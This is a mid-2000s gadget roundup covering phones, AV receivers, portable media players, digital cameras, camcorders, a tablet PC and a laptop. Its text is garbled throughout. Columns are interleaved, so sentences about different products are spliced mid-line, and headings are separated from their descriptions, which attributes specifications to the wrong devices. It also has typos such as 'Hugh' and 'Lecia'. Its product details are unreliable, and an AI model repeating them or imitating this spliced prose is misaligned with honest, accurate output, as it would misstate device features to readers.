Memory (Less compared to Nokia N91) 128 MB
Flash Memory, Mini SD Card Slot, 2.4” Display, AX2AV
Bluetooth, IrDA, 1.3 Mega pixel (1280x960) Camera
with Integrated flash, Dual Stereo speakers,
Thumbwheel, 5 way Nav Key,Left and Right soft keys,
Dedicated Camera Key, Voice Recognition software
for Voice Activated Dialing, High level of
Personalization options, light weight only 115g with
Battery & cards. Comes with a 1130 mAh (TBD)
battery, which has a talk time of 4 hours & standby
time of 8 days. It is in direct competition to blackberry
& other smartphones.

Bluetooth Wireless Module for iPod Pioneer just dropped two new receivers, the VSA-
AX4AVi and the VSX-AX2AV. Both are 7-channel
amplifiers, they support HDMI & WMA9 encoding.
The VSA-AX4AVi is tres hot because it accepts USB
connections from all kinds of audio players including
the Apple iPod. Otherwise, the differences are pretty
standard: the 7-channel VSA-AX4AVi rocks at 220W
per channel and the VSX-AX2AV runs 200Wx7
channels.

Denon Smart Life S-101

FM transmitters, step aside. Bluetooth audio


transmitters are the wave of the future. Scosche has
just released a Bluetooth wireless interface for iPod
and other MP3 players that will enable streaming audio
from your portable player to your car or home receiver.
It connects directly to the headphone jack, and
transmits to a receiver connected to either a car’s head
unit or home audio system. The Denon Smart Life S-101 is sweet enough as your
standard home theater system: couple of flat speakers,
100W subwoofer, and an adorably packaged
progressive-scan DVD player. But the real cherry on
the top here is that it plays super-nicely with your
existing iPod. You connect it via its dock connector,
which allows you to control your iPod from the remote
and charges the iPod at the same time. It then displays
a “virtual iPod” on the television screen that displays
your songs and the iPod controls, and if you have
photos stored on it, you can view them as well. Will be
launched around September.
Archos AV700
TonePro USB-Powered Hendrix

Line 6, makers of digital audio gear has a new line of


hardware due this season called the TonePro. Plug a
guitar, bass, or mike into the TonePro, jack it into a
CPU, and you have a clean sounding room along with
a software UI that looks just like an amp. TonePort
UX1 and UX2 hardware interfaces are USB-powered
devices that include Line 6 GearBox modeling
software, which provides a must-have collection of This sweet baby has a very cool & sweet 7-inch screen
guitar and bass amp/cab models, stompbox and studio with 262k colors which will blow you away. If not that
effects, and models of high-end studio microphone then surely the Hugh 100 GB storage space will. It has
preamps. Both units support 44.1/48KHz with 16/24- the ability to store a wide variety of video and audio
bit recording, a 96KHz mode, and drivers for ASIO, formats, and is able to act as a Windows Media device.
WDM, and Core Audio. The screen sports a handy layer of anti-reflective
coating. At its maximum setting, brightness levels are
very good indeed, but the contrast is ok. It has a very
GPX2 - PEPpy PEP small buttons for navigation, but is of good quality &
responds very well. It comes bundled with a TV
Docking Pod which lets you to use the player either as
a source or as a recording or playback device. It has an
integrated USB 2.0 mini jack, that lets the device
mount either as a USB Mass Storage Device or as a
Windows Media device (as part of its ability to
synchronize with Windows Media Player 10. Also
present is a USB host connector, which lets users
transfer media directly from compatible devices such
as digital cameras or other audio/video players -
extremely handy.

It is presently available in 2 configurations of 40GB


and 100 GB.

The GPX2 is a personal entertainment player (PEP)


with a nice, 3.5” LCD and support for just about
everything under the sun, including DRMed WMA et
al. It runs on Linux. It has plenty of games already
available under MAME and NES emulators and it
plays back pirate friendly OGG and DivX formats.
This ARM-based player contains 64MB built-in
memory and supports SD. Nice and thin and sexy.
Creative Zen Vision PMP LG
PM70

It features a 30 GB of hard drive space, a 3.7-inch


262K colour screen and support for a flurry of audio A 4.3" exceptionally bright and clear screen with 262K
and video formats, this pocket-sized Creative Zen colours , a 16:9 widescreen format, 30 GB HDD. Still,
Vision is set to make an impact. The device supports the list of features found in the PM70 is enough to
audio playback, photo viewing and video playback, make anyone interested in portable media viewers take
with the user interface being navigated by means of a a second look. It will support a Hugh range of video &
navigational array flanking the screen on its right side. audio formats, & even supports JPEG & BMP photo
It plays numerous formats including DRM files. It will formats. It has a FM tuner & also allows FM
also be able to download music from a number of recording. The PM70 also features the ability to
online offerings such as Napster To Go, Yahoo! Music synchronize PIM information with Microsoft Outlook,
Unlimited and more. It has a USB 2.0 connection port which is most certainly a feature not present in any
and an integrated CompactFlash Type II slot to allow current PMC devices except Creative Zen Vision PMP.
for direct transfer of media to the internal hard drive of Topping off such a comprehensive feature set is USB
the unit. Also present is Composite video out, with 2.0 connectivity, and a claimed battery life of 16 hours
support for NTSC and PAL standards. In addition to its of audio playback or 4 hours of video playback. It will
media capabilities, the Zen Vision also comes with be commercially available some time in the fourth
software which allows for the synchronization of quarter of 2005.
Contacts, Calendar and Tasks data from Microsoft
Outlook. It has a a battery life of up to 4.5 hours for
video playback. The Creative Zen Vision is
Casio Exilim EX-Z500
immediately available for in the US. It is available in
either pearl white or black.

The Casio Exilim EX-Z500 is a 5 Megapixel camera,


with 3x optical zoom with electronic image
stabilization. It boasts of a 2.7-inch LCD viewfinder
and (what they claim to be, but yet unconfirmed) the
ability to snap 500 shots on a single charge. It has a
minimum focusing range of 17 cm. ISO sensitivity optical zoom, that is the highest in a camera in the
from 50 to 800. Offers 31 preset scene modes along compact cameras segment. It has an additional 4x
with a shutter priority mode. It relies on SD/MMC digital zoom too. It uses the Lumix DC Vario lens,
Cards for storage. Has USB 2.0 connectivity & support which is made by Lecia & Panasonic. It has a large 2"
for PictBridge. It is available presently in the market, LCD screen. It features an Optical image stabilizer, the
but only in Black colour. only brand in the world which has that in a compact
size camera. So you no longer have to worry about
shaky hands blurring a shot—the optical image
stabilization system keeps pictures focused. It has a
Sony Cyber-shot DSC-W7 Digital super-fast response called the MegaBurst consecutive
shooting, that lets you snap off consecutive shots at 3
Camera frames per second with full resolution.
It is PictBridge enabled, so simply connect this camera
to any PictBridge enabled printer to print pictures
without a PC.

Canon PowerShot S2 IS

This Sony Cyber-shot® DSC-W7 digital camera


delivers stunning pictures with 7.2-megapixel
resolution. It features a 3x optical zoom & an
additional 2x digital zoom. The camera comes with
32MB of internal memory, & has in-built slot for
Memory Stick or Memory Stick PRO cards. It runs on
2 AA batteries. It has an enormous 2.5" LCD screen. It
comes with Carl Zeiss Vario-Tessar lens. It is
PictBridge enabled.

The Canon PowerShot S2 IS features a 5 megapixel


Panasonic Lumix DMC-LZ2 Digital CCD chip for great pictures. It features a 12x optical
Camera zoom that lets you get up close to an object before you
take. It comes with a 1.8" LCD screen. It has Canon's
DIGIC II Image Processor which is designed to
improve processing speed and image quality. It has
Canon’s iSAPS Technology which works with the fast
DIGIC II Image Processor to improve focus speed and
accuracy, as well as exposure and white balance.

The Panasonic DMC-LZ2 digital camera captures


outstanding pictures with 5-megapixel resolution this
means you can blow-up your pictures up to sizes as big
as 23 cm x 48 cm. It has a superb & yet unbeatable 6x
Panasonic Lumix® DMC-FZ5 JVC Everio GZ-MC500E
Digital Camera

Here is one of the first series of hard drive based


The Panasonic DMC-FZ5 digital camera captures camcorders, the JVC Everio GZ-MC500E & it has the
outstandingly sharp & clear pictures with its 5- ability to compete head-to-head with tape based
megapixel CCD. You get superb picture quality with competitors. Its exterior is a tad more unusual than
either the 6”x 4” or the full blow-up of up to sizes as most cameras, & the entire camera body can rotate up
big as 23 cm x 48 cm. It has a superb & yet sharp 12x to 45 degrees in either up or down along the vertical
optical zoom, & an additional 4x digital zoom. It uses axis of the lens. It is very compact & light weight. It
the extremely high quality & popular Leica DC Vario features a 10x optical zoom lens (8x for still images)
lens. It has a large 1.8" LCD screen. It features an with three separate 1/4.5-inch, 1.33 Megapixel CCD
Optical image stabilizer technology called “MEGA chips (it is a 3CCD camera). It has a SD Card and
O.I.S.”, which takes care of all the shaky hands CompactFlash Type II expansion slots, with the latter
blurring a shot by keeping the pictures focused. It has a by default occupied by a 4 GB MicroDrive. This
super-fast response called the MegaBurst consecutive allows for hassle-free expansion and broad
shooting, that lets you snap off consecutive shots at 3 compatibility with media readers and laptops
frames per second with full resolution. It uses SD card everywhere. It has an integrated USB 2.0 connectivity
& MultiMediaCard for storage. It is PictBridge port for a much easier way to transfer data.
enabled, so simply connect this camera to any Additionally, PictBridge and DPOF support are
PictBridge enabled printer to print pictures without a available for direct-to-printer output. It has a 1.8-inch
PC. You can even connect it to the TV, & watch the LCD screen. Audio can be recorded in 16-bit dual
pictures as a slide show. Another plus point of the channel Dolby Digital format at 48 kHz and a bit rate
camera is it has the ability to take pictures in f2.8 of 1.536 Kbps. It is immediately available in Europe &
throughout the entire zoom range. It is lighter & more North America.
professional looking & quieter than any other camera
in the class or in the budget range. It is better than the
Sony H1, Canon S1 IS & S2 IS, Kodak 7590, or the
Olympus C-770, so if you are thinking of buying any
of these cameras have a look at Panasonic FZ5 before
you decide.
Panasonic Camcorder NV-GS35 Motion Computing LS800 Tablet PC

We all know Tablet PCs aren’t selling all that


fantastically well these days, but if a convertible just
The Panasonic NV-GS35 is a excellent camera in the isn’t for you, or maybe you’re looking for something a
single CCD range of cameras, & it is the only one with little smaller, you might want to peep Motion
a Humongous 30x Optical Zoom, & 1000x Digital Computing’s LS800 8.4-inch tablet device. The device
Zoom. It has 2.5” LCD screen. It comes with 2 remotes is a svelte 2.2-pounds and is only about 8.9 x 6.7 x 0.9-
one wired & basic for recording, taking snaps, & inches. It is equipped with a 1.2GHz Pentium M ULV
zooming, & the other a fully functional Infra-red CPU, integrated WiFi, Bluetooth, biometric print
remote. It has a colour viewfinder, direct mode Dial for reader, two USB ports, and an SD slot.
easier use, a in-built video light. It has super image
stabilizer (electronic stabilizer); Zoom Mike, which Fujitsu LifeBook N6200
lets you pick distant sounds; a special Wind Cut
feature which contributes to reducing wind noise;
Colour Night View; Quick starts in 1.7 secs; can be
used as a Web-cam. It has an integrated SD card/
MMC card slot for storing pictures. It has a really cool
feature called the “Simultaneous Motion Video & Still
Picture Recording” which lets you to record videos in
tape & at the same time take snaps which are stored in
the SD/MMC card, without delaying or affecting one
another. It has an USB 2.0 port, for transferring video
& still data from the camera to the PC, it even has the
USB streaming option which lets u to transfer video to
the PC at the speed of 480 Mbps. It is the best camera
in the price range & features range. Fujitsu LifeBook N6200 is a really cool laptop, which
qualifies to be a full-size desktop replacement packing
Pentium M, a 17-inch WXGA TFT LCD, ATI
Mobility Radeon X600 graphics with 128 MB video
memory, 802.11a/b/g and Gigabit Ethernet, Memory
Stick/SD/xD card slots, and 3D Dolby audio with
subwoofer. Tooled for gamers and multimedia
producers/consumers, it’ll come in configurations up to
2GB DDR2 RAM and your choice of a slower 200GB
or faster (7200 rpm) 60GB internal drive.